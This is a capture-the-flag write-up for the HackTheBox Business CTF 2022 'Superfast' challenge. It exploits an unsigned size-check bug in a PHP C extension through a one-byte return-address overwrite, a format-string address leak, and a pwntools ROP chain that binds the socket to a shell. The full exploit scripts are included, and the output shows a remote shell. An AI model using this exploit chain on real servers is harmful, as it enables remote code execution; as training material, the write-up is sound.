Superfast (HackTheBox)
Hey folks. In this write-up, we're going to discuss the Superfast challenge on HackTheBox, which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to work around ASLR, leak stack pointers, and build a Return Oriented Programming (ROP) chain. The description of the challenge is:
We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we acquired from a temporarily exposed Git repository several months ago. Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?
I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.
Index
- First looks
- Finding primitives
- Developing the ROP chain
- Retrieving the flag
First looks
We're given a PHP file, a shared object (.so) written in C, and the source directory for that shared object.
.
├── build_docker.sh
├── challenge
│ ├── index.php
│ ├── php_logger.so
│ └── start.sh
├── Dockerfile
└── src
├── build.sh
├── config.m4
├── php_logger.c
└── php_logger.h
2 directories, 9 files
Directories given with the challenge
In /challenge/start.sh we can see that the challenge code gets bootstrapped using:
#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done
The content of start.sh
We can see that PHP loads php_logger.so as a binary extension for the webserver.
Finding primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.
Analysing index.php
The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.
<?php
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
$key = intval($_SERVER['HTTP_CMD_KEY']);
if ($key <= 0 || $key > 255) {
http_response_code(400);
} else {
log_cmd($_GET['cmd'], $key);
}
} else {
http_response_code(400);
}
Content of index.php
One of the most important stages of exploit development is setting up an environment in which the bug can be reproduced. Since I want to run GDB on php_logger.so, I will run the challenge without Docker. I can serve index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/, and I can send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123'. We can see it succeeds because it returns a 200 status code.
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing
Verbose output of the PHP webserver
Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.
Analyzing php_logger.so
We can find the source code of php_logger.so in /src/php_logger.c, which also contains the source code of log_cmd(). We can see that log_cmd() retrieves its function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and - if the return value is valid - appends the result to the /tmp/log file.
PHP_FUNCTION(log_cmd) {
char* input;
zend_string* res;
size_t size;
long key;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
RETURN_NULL();
}
res = decrypt(input, size, (uint8_t)key);
if (!res) {
print_message("Invalid input provided\n");
} else {
FILE* f = fopen("/tmp/log", "a");
fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
fclose(f);
}
RETURN_NULL();
}
Source code of log_cmd()
This function looks safe, so the vulnerability must be in decrypt(input, size, key). This function is supposed to check whether the size of the command is less than the size of the stack buffer. If it is not, it returns NULL; if it is, it memcpy()s the command into the buffer and XORs the buffer with the key.
zend_string* decrypt(char* buf, size_t size, uint8_t key) {
char buffer[64] = {0};
if (sizeof(buffer) - size > 0) {
memcpy(buffer, buf, size);
} else {
return NULL;
}
for (int i = 0; i < sizeof(buffer) - 1; i++) {
buffer[i] ^= key;
}
return zend_string_init(buffer, strlen(buffer), 0);
}
Source code of decrypt()
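Because decrypt() XORs the buffer with the key, any text we want to end up in the buffer has to be sent already XORed with that key. The sketch below is a rough Python model of that behaviour, not the extension's code: xor_bytes() and decrypt_model() are hypothetical helper names, and the model only mirrors the loop bound of 63 bytes seen in the C source.

```python
BUFFER_SIZE = 64  # sizeof(buffer) in decrypt()


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def decrypt_model(data: bytes, key: int) -> bytes:
    """Rough model of decrypt(): copy the input, then XOR the first 63 bytes.

    Bytes from index 63 onwards are left exactly as they were sent.
    """
    buf = bytearray(data.ljust(BUFFER_SIZE, b"\x00"))
    for i in range(BUFFER_SIZE - 1):
        buf[i] ^= key
    return bytes(buf)


key = 4
wanted = b"%llx_%llx_"            # what we want the buffer to contain
sent = xor_bytes(wanted, key)     # what we actually put in ?cmd=
after = decrypt_model(sent, key)
print(sent, after[:len(wanted)])
```

Only the first 63 bytes are transformed back, so anything placed beyond that point (padding, return address bytes) arrives in memory exactly as sent.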
We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() yields a size_t, which is an unsigned type (an unsigned long on 64-bit Linux), and size is a size_t as well. The subtraction is therefore performed in unsigned arithmetic, which means the result wraps around instead of going negative. For example, (uint)0 - (int)1 becomes 2**32-1 instead of -1. A practical example, using a 32-bit unsigned int for brevity, is the one below. The output of the program is 4294967295 1.
#include <stdio.h>

int main()
{
    unsigned int a = 5;
    int b = 6;
    /* b is converted to unsigned, so a - b wraps around to 2**32 - 1 */
    printf("%u %d", a - b, a - b > 0);
    return 0;
}
Demo of interaction between (unsigned) integers
That means that sizeof(buffer) - size > 0 is always true, unless sizeof(buffer) == size. The result is a buffer overflow on the stack, which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.
![](https://pwning.tech/content/images/2022/11/image-6.png)
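To see which sizes slip through the check in decrypt(), the unsigned comparison can be modelled in Python by masking the subtraction to 64 bits. This is a sketch under the assumption that size_t is 64 bits wide (as on x86-64 Linux); check_passes() and intended_check() are hypothetical names, and the second one is only a guess at what the author of the extension meant to write.

```python
MASK64 = (1 << 64) - 1  # size_t is assumed to be 64 bits wide
BUFFER_SIZE = 64        # sizeof(buffer) in decrypt()


def check_passes(size: int) -> bool:
    """Model of `sizeof(buffer) - size > 0` in unsigned 64-bit arithmetic."""
    return ((BUFFER_SIZE - size) & MASK64) > 0


def intended_check(size: int) -> bool:
    """What the check was presumably meant to express: size < sizeof(buffer)."""
    return size < BUFFER_SIZE


for size in (10, 63, 64, 65, 153):
    print(size, check_passes(size), intended_check(size))
```

Every size except exactly 64 passes the modelled check, including the 153 bytes needed to reach the first byte of the return address.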
However, ASLR is enabled. That means we cannot predict where the library is mapped and hence cannot guess a full return address for control flow hijacking. The least significant 12 bits of an address are not randomized, though, so we can reliably overwrite bits within that range. Say our normal return address is 0x555555559a1e; on the next run it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because those are the least significant 12 bits.
The reason the lowest 12 bits of the address don't change is that they are the offset within a 4096-byte (2 ** 12) page. The kernel - the manager of ASLR - maps memory at page granularity, so it can only randomize the bits above that offset.
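The split between the randomized part and the fixed part of an address can be checked with a bit mask. The following sketch uses the two example addresses from the text; page_base() and page_offset() are illustrative helper names, and a 4096-byte page size is assumed.

```python
PAGE_SIZE = 4096  # 2 ** 12 bytes, assumed page size


def page_offset(addr: int) -> int:
    """Low 12 bits: the position inside the page, untouched by ASLR."""
    return addr & (PAGE_SIZE - 1)


def page_base(addr: int) -> int:
    """Everything above the low 12 bits: the part ASLR can move."""
    return addr & ~(PAGE_SIZE - 1)


run_a = 0x555555559a1e
run_b = 0x55555123fa1e

for addr in (run_a, run_b):
    print(hex(page_base(addr)), hex(page_offset(addr)))
```

Both runs share the offset 0xa1e while the page base differs.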
Sadly, we can only write whole bytes (8 bits) at a time, considering we're working with a char data type. This means we can only reliably overwrite the 0x1e part of the addresses listed above (a second byte would also clobber 4 randomized bits), which narrows our possible return address area.
In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is 0x101429. This means our scope of possible return addresses ranges from 0x101400 to 0x1014ff.
0010141e 48 89 ce MOV param_2,RCX
00101421 48 89 c7 MOV param_1,RAX
00101424 e8 07 fc CALL decrypt
ff ff
00101429 48 89 44 MOV qword ptr [RSP + local_10],RAX
24 38
0010142e 48 83 7c CMP qword ptr [RSP + local_10],0x0
24 38 00
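Taking the return address 0x101429 from the listing above, the effect of a one-byte overwrite can be worked out directly. The sketch below assumes a little-endian x86-64 target, where the first byte written past the 152 bytes of padding is the least significant byte of the saved return address; overwrite_low_byte() is a hypothetical helper.

```python
import struct


def overwrite_low_byte(addr: int, new_byte: int) -> int:
    """Replace only the least significant byte of an address."""
    return (addr & ~0xFF) | (new_byte & 0xFF)


ret = 0x101429  # return address after CALL decrypt, as shown by Ghidra

# Little-endian layout: the low byte sits first in memory.
in_memory = struct.pack("<Q", ret)
print(in_memory.hex())

lowest = overwrite_low_byte(ret, 0x00)
highest = overwrite_low_byte(ret, 0xFF)
print(hex(lowest), hex(highest))

# The scripts in this write-up append b"\x40" after the padding.
print(hex(overwrite_low_byte(ret, 0x40)))
```

With ASLR enabled the upper bytes change on every run, but the byte we write lands on the same position inside the page, so the relative target stays the same.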
The code in our return scope is the following. We can see that decrypt() is called, print_message() is called, and a bunch of file IO functions are called. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.
*(undefined4 *)(param_2 + 8) = 1;
}
else {
iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen);
local_10 = CONCAT44(extraout_var,iVar1);
if (local_10 == 0) {
print_message("Invalid input provided\n");
}
else {
local_18 = fopen("/tmp/log","a");
fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18);
fclose(local_18);
}
*(undefined4 *)(param_2 + 8) = 1;
}
return;
}
C decompilation of our return scope
However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.
00101385 48 8b 84 MOV RAX,qword ptr [RSP + local_18]
24 a0 00
00 00
0010138d 48 89 c6 MOV inputlen,RAX
00101390 48 89 cf MOV input,param_4
00101393 e8 e8 fc CALL <EXTERNAL>::memcpy
ff ff
00101398 48 8b 54 MOV key,qword ptr [RSP + local_58]
24 60
Assembly code which moves the input into the RDI register
When I try to fuzz using a script, I receive the following output:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~
Fuzzing output
from pwn import xor
import requests
xorkey = 1
s = requests.session()
headers = {"cmd-key": str(xorkey)}
# offset = 152
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))
Script used to fuzz
However, when we remove the xor() function call, we can see that the end of the response looks like an address: b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak points, we can start a GDB server. On a debugged run we leak 0x7f651305f54041; the lowest byte (0x41) appears to be a trailing 'A' from our input, so the pointer itself is 0x7f651305f540. In GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this mapping isn't executable, it's irrelevant for the ROP chain.
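The u64() conversion used here can be reproduced with the standard library, which makes the byte order explicit. This is a minimal sketch using the leaked bytes quoted above; the mapping bounds are the ones reported by vmmap, and dropping the low byte is my reading of the leak rather than something the tooling reports.

```python
leak = b"A\x80\xd4\x85T\x81\x7f"  # tail of the response from the fuzzing run

# Same result as pwntools' u64(): pad to 8 bytes, read as little-endian.
value = int.from_bytes(leak.ljust(8, b"\x00"), "little")
print(hex(value))

# Value leaked during the GDB run, including the leading 0x41 byte.
gdb_leak = 0x7f651305f54041
pointer = gdb_leak >> 8  # drop the lowest byte (0x41)

region_start, region_end = 0x7f6513000000, 0x7f6513200000
print(hex(pointer), region_start <= pointer < region_end)
```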
from pwn import xor, gdb, u64
import requests
import time
gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5)
xorkey = 1
s = requests.session()
headers = {"cmd-key": str(xorkey)}
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00'))))
time.sleep(999)
Script for debugging using GDB
Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the script below, we get the following leaks:
php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480
Output of the script
#!/usr/bin/env python3
from pwn import xor, u64, gdb
import requests
import time
gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(3)
xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)}
fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url)
content = s.get(url, headers=headers).content
addresses = content.split(b"_")
php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)
print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack))
time.sleep(999)
Payload for leaking addresses
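The parsing step of that script can be exercised offline. In the sketch below the response body is synthetic: fields 0, 5 and 8 are back-computed from the base addresses printed in the output above, and every other field is a placeholder 0. The two offsets are the ones the script subtracts; parse_leak() is a hypothetical helper name.

```python
PHP_LEAK_OFFSET = 0x55e240   # subtracted from field 5 in the script
LOGGER_LEAK_OFFSET = 0x1445  # subtracted from field 8 in the script


def parse_leak(body: bytes) -> dict:
    """Split the '_'-separated %llx output and rebase the useful fields."""
    fields = body.split(b"_")
    return {
        "stack": int(fields[0], 16),
        "php": int(fields[5], 16) - PHP_LEAK_OFFSET,
        "php_logger.so": int(fields[8], 16) - LOGGER_LEAK_OFFSET,
    }


# Synthetic body (assumption): only fields 0, 5 and 8 carry real values.
sample = b"7fff10fbd480_0_0_0_0_55c720fc2240_0_0_7f609866f445_"

bases = parse_leak(sample)
for name, addr in bases.items():
    print(name, "@", hex(addr))

# Sanity check: image bases should be page aligned.
aligned = all(bases[k] & 0xFFF == 0 for k in ("php", "php_logger.so"))
print("page aligned:", aligned)
```

The alignment check is a cheap way to notice that an offset is wrong for a different build of php or php_logger.so before sending a ROP chain.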
We have the needed primitives, so we can develop the ROP chain.
Developing the ROP chain
Now we can use pwntools' ELF and ROP classes to build the ROP chain automatically. Using pwntools' ELF class we can see that the execl function is in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:
- Leak the addresses of the PHP binary and php_logger.so in memory.
- Call dup2(4, N) to point the stdin, stdout and stderr file descriptors at the TCP connection file descriptor of the webserver.
- Call execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable.
We can generate a ROP chain automatically with pwntools:
rop = ROP(php)
'''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''
# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])
binsh = next(php.search(b"/bin/sh\x00"))
rop.call('execl', [binsh, binsh, 0])
print(rop.dump())
Python code for generating the ROP chain
Which gives the following ROP chain:
0x0000: 0x56244b60816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x56244b6043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x56244b601be0 dup2
0x0028: 0x56244b60816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x56244b6043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x56244b601be0 dup2
0x0050: 0x56244b60816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x56244b6043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x56244b601be0 dup2
0x0078: 0x56244b60816b pop rdi; ret
0x0080: 0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088: 0x56244b60487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x56244b6043fc pop rsi; ret
0x00a0: 0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8: 0x56244b6042d0 execl
ROP chain generated by pwntools
As we can see, it does the following:
dup2(4, 0)
dup2(4, 1)
dup2(4, 2)
execl("/bin/sh", "/bin/sh", 0)
C representation of the ROP chain
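Under the hood, the chain is just a sequence of 8-byte little-endian words placed where the saved return address used to be. The sketch below packs the words from the dump above by hand with struct; the addresses are copied from that one run and are only valid for it, so this illustrates the layout and is not a reusable payload.

```python
import struct

POP_RDI = 0x56244b60816b  # pop rdi; ret
POP_RSI = 0x56244b6043fc  # pop rsi; ret
POP_RDX = 0x56244b60487c  # pop rdx; ret
DUP2 = 0x56244b601be0
EXECL = 0x56244b6042d0
BINSH = 0x56244bd03fc3    # address of "/bin/sh" inside the php binary

words = []
for target_fd in (0, 1, 2):
    # dup2(4, target_fd): rdi = 4, rsi = target_fd
    words += [POP_RDI, 4, POP_RSI, target_fd, DUP2]

# execl("/bin/sh", "/bin/sh", 0): rdi = rsi = BINSH, rdx = 0
words += [POP_RDI, BINSH, POP_RDX, 0, POP_RSI, BINSH, EXECL]

chain = b"".join(struct.pack("<Q", w) for w in words)
payload = b"A" * 152 + chain  # 152 bytes of padding up to the return address

print(len(words), hex(len(chain)), len(payload))
```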
Retrieving the flag
I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.
#!/usr/bin/env python3
from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib.parse
#gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5)
target_ip = b"161.35.173.232"
target_port = b"31302"
target_host = b"http://" + target_ip + b":" + target_port
s = requests.session()
headers = {"cmd-key": "1"}
fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40"
print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_")
print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals
php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)
print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack))
rop = ROP(php)
'''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''
# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])
binsh = next(php.search(b"/bin/sh\x00"))
rop.call('execl', [binsh, binsh, 0])
print(rop.dump())
payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n"
print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive()
time.sleep(999)
Python script for retrieving the flag
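The final request is sent over a raw socket because the payload contains arbitrary bytes, so it has to be percent-encoded before it goes into the query string. The following sketch shows that encoding step in isolation; build_request() is a hypothetical helper, the sample payload is a stand-in for the real chain, and it uses CRLF line endings as HTTP specifies, whereas the script above sends bare \n.

```python
from urllib.parse import quote, unquote_to_bytes


def build_request(payload: bytes, key: int) -> bytes:
    """Build a raw GET request with the payload percent-encoded in ?cmd=."""
    path = "/index.php?cmd=" + quote(payload)
    request = f"GET {path} HTTP/1.1\r\nCmd-Key: {key}\r\n\r\n"
    return request.encode("ascii")


# Stand-in payload: padding plus one little-endian address with null bytes.
sample_payload = b"A" * 4 + bytes.fromhex("6b81604b24560000")

encoded = quote(sample_payload)
print(encoded)
print(build_request(sample_payload, 1))

# Decoding on the server side should give back the exact bytes.
round_trip = unquote_to_bytes(encoded)
print(round_trip == sample_payload)
```

Percent-encoding keeps null bytes and non-ASCII bytes intact through the HTTP layer, which matters because every address in the chain ends in two zero bytes.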
$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000: 0x55da3d00816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x55da3d0043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x55da3d001be0 dup2
0x0028: 0x55da3d00816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x55da3d0043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x55da3d001be0 dup2
0x0050: 0x55da3d00816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x55da3d0043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x55da3d001be0 dup2
0x0078: 0x55da3d00816b pop rdi; ret
0x0080: 0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088: 0x55da3d00487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x55da3d0043fc pop rsi; ret
0x00a0: 0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8: 0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf
Output of the exploit
Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.